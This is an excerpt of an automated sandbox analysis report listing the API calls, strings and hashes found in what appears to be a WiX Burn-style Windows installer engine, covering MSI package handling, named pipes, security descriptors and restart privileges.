                                                                                                                  • Part of subcall function 009A3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,009A21CC,000001C7,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3BDB
                                                                                                                  • Part of subcall function 009A3BD3: HeapSize.KERNEL32(00000000,?,009A21CC,000001C7,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3BE2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$ProcessSizelstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3492610842-0
                                                                                                                • Opcode ID: 07d3e56aa9d874ed1409cb2dc924de9c299392f7f9761f050b78d90ce19a1821
                                                                                                                • Instruction ID: 3878d7ade3c379ba5d33768f110489ce469fde5729890640229151f717a25376
                                                                                                                • Opcode Fuzzy Hash: 07d3e56aa9d874ed1409cb2dc924de9c299392f7f9761f050b78d90ce19a1821
                                                                                                                • Instruction Fuzzy Hash: 72012D37600219ABCF115E58DCC4F9A77EADF8A760F114215FA165B161D731DC008AE4
                                                                                                                APIs
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 009AB11C
                                                                                                                  • Part of subcall function 009A394F: GetProcessHeap.KERNEL32(?,000001C7,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3960
                                                                                                                  • Part of subcall function 009A394F: RtlAllocateHeap.NTDLL(00000000,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3967
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,009ECA9C,000000FF,DirectorySearch,000000FF,009ECA9C,Condition,feclient.dll,009ECA9C,Variable,?,009ECA9C,009ECA9C,?,?), ref: 009AAA29
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 009AAA7E
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,path,000000FF), ref: 009AAA9A
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,FileSearch,000000FF), ref: 009AAABE
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 009AAB11
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 009AAB2B
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,RegistrySearch,000000FF), ref: 009AAB53
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCR,000000FF,?,Root,?), ref: 009AAB91
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCU,000000FF), ref: 009AABB0
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKLM,000000FF), ref: 009AABCF
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Win64,msi.dll,?,Type,?,?,Value,version.dll,?), ref: 009AAC8D
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,value,000000FF), ref: 009AACA7
                                                                                                                  • Part of subcall function 009E32F3: VariantInit.OLEAUT32(?), ref: 009E3309
                                                                                                                  • Part of subcall function 009E32F3: SysAllocString.OLEAUT32(?), ref: 009E3325
                                                                                                                  • Part of subcall function 009E32F3: VariantClear.OLEAUT32(?), ref: 009E33AC
                                                                                                                  • Part of subcall function 009E32F3: SysFreeString.OLEAUT32(00000000), ref: 009E33B7
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,numeric,000000FF,?,VariableType,?,?,ExpandEnvironment,cabinet.dll), ref: 009AAD06
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,string,000000FF), ref: 009AAD28
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 009AAD48
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,directory,000000FF), ref: 009AAE20
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 009AAFFE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Compare$Free$HeapVariant$AllocAllocateClearInitProcess
                                                                                                                • String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch$ExpandEnvironment$Failed to allocate memory for search structs.$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @FeatureId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FeatureId$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiFeatureSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$`<u$assignment$cabinet.dll$clbcatq.dll$comres.dll$directory$exists$feclient.dll$keyPath$language$msi.dll$numeric$path$search.cpp$state$string$value$version$version.dll$wininet.dll
                                                                                                                • API String ID: 2748437055-56916464
                                                                                                                • Opcode ID: 2605b69b706197a4cb84556c6bd3b3b1e858f94bdbcca385b87f09a02f90954d
                                                                                                                • Instruction ID: 76cf64da7d93db8efde01e27ab8ff6aed2ced086eb2c2f4e334d1b6ef0231377
                                                                                                                • Opcode Fuzzy Hash: 2605b69b706197a4cb84556c6bd3b3b1e858f94bdbcca385b87f09a02f90954d
                                                                                                                • Instruction Fuzzy Hash: 8E22C531D4827ABBDB228AA58C46F6F7A64AB46734F304310F630B72D5DB70AE40D6D1
                                                                                                                Strings
                                                                                                                • REBOOT=ReallySuppress, xrefs: 009C45A0, 009C476C
                                                                                                                • VersionString, xrefs: 009C428E, 009C42EF
                                                                                                                • Failed to add obfuscated properties to argument string., xrefs: 009C4497
                                                                                                                • IGNOREDEPENDENCIES, xrefs: 009C46A5, 009C4784
                                                                                                                • Failed to add feature action properties to argument string., xrefs: 009C44B9
                                                                                                                • Failed to add reinstall mode and reboot suppression properties on minor upgrade., xrefs: 009C460C
                                                                                                                • %ls %ls=ALL, xrefs: 009C46B6, 009C4795
                                                                                                                • WixBundleExecutePackageAction, xrefs: 009C43B7, 009C48B4
                                                                                                                • Failed to run maintanance mode for MSI package., xrefs: 009C46F6
                                                                                                                • Failed to add reinstall mode and reboot suppression properties on repair., xrefs: 009C469B
                                                                                                                • msasn1.dll, xrefs: 009C440B
                                                                                                                • Failed to add reboot suppression property on uninstall., xrefs: 009C477D
                                                                                                                • Failed to get cached path for package: %ls, xrefs: 009C434F
                                                                                                                • Failed to add feature action properties to obfuscated argument string., xrefs: 009C44DB
                                                                                                                • Failed to perform minor upgrade of MSI package., xrefs: 009C4638
                                                                                                                • feclient.dll, xrefs: 009C42C5, 009C434D, 009C441D, 009C454B, 009C47D8
                                                                                                                • Failed to add reinstall all property on minor upgrade., xrefs: 009C45EA
                                                                                                                • Failed to uninstall MSI package., xrefs: 009C47EF
                                                                                                                • Failed to install MSI package., xrefs: 009C4746
                                                                                                                • Failed to add ADMIN property on admin install., xrefs: 009C471E
                                                                                                                • Failed to add reboot suppression property on install., xrefs: 009C45BB
                                                                                                                • %ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress, xrefs: 009C4687
                                                                                                                • REINSTALL=ALL, xrefs: 009C45D3, 009C464D
                                                                                                                • ACTION=ADMIN, xrefs: 009C4709
                                                                                                                • Failed to initialize external UI handler., xrefs: 009C43F4
                                                                                                                • Failed to enable logging for package: %ls to: %ls, xrefs: 009C441F
                                                                                                                • crypt32.dll, xrefs: 009C440A
                                                                                                                • Failed to add the list of dependencies to ignore to the properties., xrefs: 009C46CA
                                                                                                                • Failed to add properties to argument string., xrefs: 009C4463
                                                                                                                • Failed to build MSI path., xrefs: 009C439D
                                                                                                                • Failed to add patch properties to obfuscated argument string., xrefs: 009C451F
                                                                                                                • Failed to add patch properties to argument string., xrefs: 009C44FD
                                                                                                                • WixBundleExecutePackageCacheFolder, xrefs: 009C436A, 009C48A4
                                                                                                                • REINSTALLMODE="vomus" REBOOT=ReallySuppress, xrefs: 009C45F5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ACTION=ADMIN$ REBOOT=ReallySuppress$ REINSTALL=ALL$ REINSTALLMODE="vomus" REBOOT=ReallySuppress$%ls %ls=ALL$%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress$Failed to add ADMIN property on admin install.$Failed to add feature action properties to argument string.$Failed to add feature action properties to obfuscated argument string.$Failed to add obfuscated properties to argument string.$Failed to add patch properties to argument string.$Failed to add patch properties to obfuscated argument string.$Failed to add properties to argument string.$Failed to add reboot suppression property on install.$Failed to add reboot suppression property on uninstall.$Failed to add reinstall all property on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on repair.$Failed to add the list of dependencies to ignore to the properties.$Failed to build MSI path.$Failed to enable logging for package: %ls to: %ls$Failed to get cached path for package: %ls$Failed to initialize external UI handler.$Failed to install MSI package.$Failed to perform minor upgrade of MSI package.$Failed to run maintanance mode for MSI package.$Failed to uninstall MSI package.$IGNOREDEPENDENCIES$VersionString$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$crypt32.dll$feclient.dll$msasn1.dll
                                                                                                                • API String ID: 0-2033600224
                                                                                                                • Opcode ID: 56a5a31f2ebccc795c13438aec6d1e83ca9cbfebcfb5cb98e5b083694d2d11b2
                                                                                                                • Instruction ID: d829e7f5e8d25f5d1c00274b701f42829d57ace1283cc13814f164d2c0b55def
                                                                                                                • Opcode Fuzzy Hash: 56a5a31f2ebccc795c13438aec6d1e83ca9cbfebcfb5cb98e5b083694d2d11b2
                                                                                                                • Instruction Fuzzy Hash: D502C571E00669AFDB229F54CD51FA977AABF84714F0041A9FA08A7251D732DEA0CF81
                                                                                                                APIs
                                                                                                                • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 009E17B1
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009E17BB
                                                                                                                • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 009E1808
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009E180E
                                                                                                                • CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 009E1848
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009E184E
                                                                                                                • CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 009E188E
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009E1894
                                                                                                                • CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 009E18D4
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009E18DA
                                                                                                                • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 009E191A
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009E1920
                                                                                                                • SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 009E1A11
                                                                                                                • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 009E1A4B
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009E1A55
                                                                                                                • SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 009E1A8D
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009E1A97
                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009E1AD0
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009E1ADA
                                                                                                                • CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 009E1B18
                                                                                                                • LocalFree.KERNEL32(?), ref: 009E1B2E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
                                                                                                                • String ID: srputil.cpp
                                                                                                                • API String ID: 267631441-4105181634
                                                                                                                • Opcode ID: 3dc028ec0dcd69c47b3c23f23de08770962e850f037ce381056e8c1b97cb9109
                                                                                                                • Instruction ID: 58bead1bd884e66a9d819bcc6a72509b54b807260b85b21bda28f0b9d1455327
                                                                                                                • Opcode Fuzzy Hash: 3dc028ec0dcd69c47b3c23f23de08770962e850f037ce381056e8c1b97cb9109
                                                                                                                • Instruction Fuzzy Hash: 66C13376D4127DABD7318B969C48BDFFABCBF44750F0105AAA905BB250E7709E408EA0
                                                                                                                Strings
                                                                                                                • Failed to copy filename for pseudo bundle., xrefs: 009CC417
                                                                                                                • Failed to copy uninstall arguments for related bundle package, xrefs: 009CC623
                                                                                                                • Failed to copy install arguments for related bundle package, xrefs: 009CC584
                                                                                                                • -%ls, xrefs: 009CC34C
                                                                                                                • Failed to copy display name for pseudo bundle., xrefs: 009CC74F
                                                                                                                • Failed to copy key for pseudo bundle., xrefs: 009CC542
                                                                                                                • Failed to allocate memory for pseudo bundle payload hash., xrefs: 009CC4AD
                                                                                                                • Failed to copy version for pseudo bundle., xrefs: 009CC72D
                                                                                                                • Failed to append relation type to install arguments for related bundle package, xrefs: 009CC5A9
                                                                                                                • Failed to copy repair arguments for related bundle package, xrefs: 009CC5D0
                                                                                                                • Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 009CC385
                                                                                                                • Failed to allocate memory for dependency providers., xrefs: 009CC6DE
                                                                                                                • Failed to append relation type to repair arguments for related bundle package, xrefs: 009CC5F1
                                                                                                                • pseudobundle.cpp, xrefs: 009CC379, 009CC3B2, 009CC4A1, 009CC6D2
                                                                                                                • Failed to copy local source path for pseudo bundle., xrefs: 009CC43B
                                                                                                                • Failed to copy key for pseudo bundle payload., xrefs: 009CC3F3
                                                                                                                • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 009CC3BE
                                                                                                                • Failed to copy cache id for pseudo bundle., xrefs: 009CC55F
                                                                                                                • Failed to copy download source for pseudo bundle., xrefs: 009CC469
                                                                                                                • Failed to append relation type to uninstall arguments for related bundle package, xrefs: 009CC644
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocateProcess
                                                                                                                • String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
                                                                                                                • API String ID: 1357844191-2832335422
                                                                                                                • Opcode ID: edc1218ac99a508f9979c213341b551fca5e5295bf8d81dd9b56ce064cebfe61
                                                                                                                • Instruction ID: a70a3c1b90aedb882a8a3f0e571dd2df9c88a8b8d1e12dfe0d11481d90e2b878
                                                                                                                • Opcode Fuzzy Hash: edc1218ac99a508f9979c213341b551fca5e5295bf8d81dd9b56ce064cebfe61
                                                                                                                • Instruction Fuzzy Hash: 27C1E1B1E0465ABBCB15CF28C891F6A7BA9FF48714B00852AF909EB351D770EC109BD1
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 009A4617
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 009A461E
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 009A4628
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 009A4678
                                                                                                                • GetLastError.KERNEL32 ref: 009A4682
                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 009A46C6
                                                                                                                • GetLastError.KERNEL32 ref: 009A46D0
                                                                                                                • Sleep.KERNEL32(000003E8), ref: 009A470C
                                                                                                                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,80040002), ref: 009A471D
                                                                                                                • GetLastError.KERNEL32 ref: 009A4727
                                                                                                                • CloseHandle.KERNEL32(?), ref: 009A477D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$ProcessToken$AdjustCloseCurrentHandleInitiateLookupOpenPrivilegePrivilegesShutdownSleepSystemValue
                                                                                                                • String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$engine.cpp
                                                                                                                • API String ID: 2241679041-1583736410
                                                                                                                • Opcode ID: 66e6d959539e4b834b6163974e0ebbe28d832297ac93afd9449b10bcf71d23d0
                                                                                                                • Instruction ID: a618d5ebf389a7593c6f1d631377d1f9a80f9ab2af7c130643bc60b881d65991
                                                                                                                • Opcode Fuzzy Hash: 66e6d959539e4b834b6163974e0ebbe28d832297ac93afd9449b10bcf71d23d0
                                                                                                                • Instruction Fuzzy Hash: CC413D73E50379ABDB219BE58C86B7F766CAB83755F110125FE00FB190D7A45D0045E1
                                                                                                                APIs
                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 009B4F0D
                                                                                                                • GetLastError.KERNEL32(?,00000000,?,?,009A452F,?), ref: 009B4F16
                                                                                                                • CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,?,?,00000000,?,?,009A452F,?), ref: 009B4FB8
                                                                                                                • GetLastError.KERNEL32(?,009A452F,?), ref: 009B4FC5
                                                                                                                • CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,00000000,?,?,?,?,?,?,?,009A452F), ref: 009B5040
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,009A452F,?), ref: 009B504B
                                                                                                                • CloseHandle.KERNEL32(00000000,pipe.cpp,00000132,00000000,?,?,?,?,?,?,?,009A452F,?), ref: 009B508B
                                                                                                                • LocalFree.KERNEL32(00000000,?,009A452F,?), ref: 009B50B9
                                                                                                                Strings
                                                                                                                • D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD), xrefs: 009B4F08
                                                                                                                • Failed to create the security descriptor for the connection event and pipe., xrefs: 009B4F44
                                                                                                                • Failed to allocate full name of pipe: %ls, xrefs: 009B4F84
                                                                                                                • pipe.cpp, xrefs: 009B4F3A, 009B4FE9, 009B506F
                                                                                                                • Failed to create pipe: %ls, xrefs: 009B4FF6, 009B507C
                                                                                                                • Failed to allocate full name of cache pipe: %ls, xrefs: 009B5022
                                                                                                                • \\.\pipe\%ls, xrefs: 009B4F6E
                                                                                                                • \\.\pipe\%ls.Cache, xrefs: 009B500C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CreateDescriptorNamedPipeSecurity$CloseConvertFreeHandleLocalString
                                                                                                                • String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
                                                                                                                • API String ID: 1214480349-3253666091
                                                                                                                • Opcode ID: e2ad58dbacda48328d48cae3cc6612755453209764ed98bc4bdd70593f33272f
                                                                                                                • Instruction ID: ed5b5eed7e4bdc793cd62504c816a1f5ae125b395760bbadb944a8ff209e14d4
                                                                                                                • Opcode Fuzzy Hash: e2ad58dbacda48328d48cae3cc6612755453209764ed98bc4bdd70593f33272f
                                                                                                                • Instruction Fuzzy Hash: B151C432D4162ABBDB21AB948E46BEEBB68AF44730F110121FE14BB191D3B55E409BD1
                                                                                                                APIs
                                                                                                                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000003,F0000040,00000003,00000000,00000000,009B9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0), ref: 009DFAC7
                                                                                                                • GetLastError.KERNEL32 ref: 009DFAD1
                                                                                                                • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?), ref: 009DFB0E
                                                                                                                • GetLastError.KERNEL32 ref: 009DFB18
                                                                                                                • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 009DFB5F
                                                                                                                • ReadFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 009DFB83
                                                                                                                • GetLastError.KERNEL32 ref: 009DFB8D
                                                                                                                • CryptDestroyHash.ADVAPI32(00000000), ref: 009DFBCA
                                                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 009DFBE1
                                                                                                                • GetLastError.KERNEL32 ref: 009DFBFC
                                                                                                                • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 009DFC34
                                                                                                                • GetLastError.KERNEL32 ref: 009DFC3E
                                                                                                                • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00008004,00000001), ref: 009DFC77
                                                                                                                • GetLastError.KERNEL32 ref: 009DFC85
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease
                                                                                                                • String ID: cryputil.cpp
                                                                                                                • API String ID: 3955742341-2185294990
                                                                                                                • Opcode ID: 26e503da5c0f4978fd1fe8f247e1958eace46306eec8b23b1ec8a9ce3c30dff6
                                                                                                                • Instruction ID: 732628db3b16efb68946338d4bc627df6c5772867187c494f8cfb1a4fb6f18b4
                                                                                                                • Opcode Fuzzy Hash: 26e503da5c0f4978fd1fe8f247e1958eace46306eec8b23b1ec8a9ce3c30dff6
                                                                                                                • Instruction Fuzzy Hash: 1151F837D90179ABD7318A51CC66BDB7668BF04751F0180B7BE4AFA350E3749D809AE0
                                                                                                                Strings
                                                                                                                • Failed to move verified file to complete payload path: %ls, xrefs: 009BA06C
                                                                                                                • Failed to create unverified path., xrefs: 009B9F6E
                                                                                                                • Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 009B9FCB
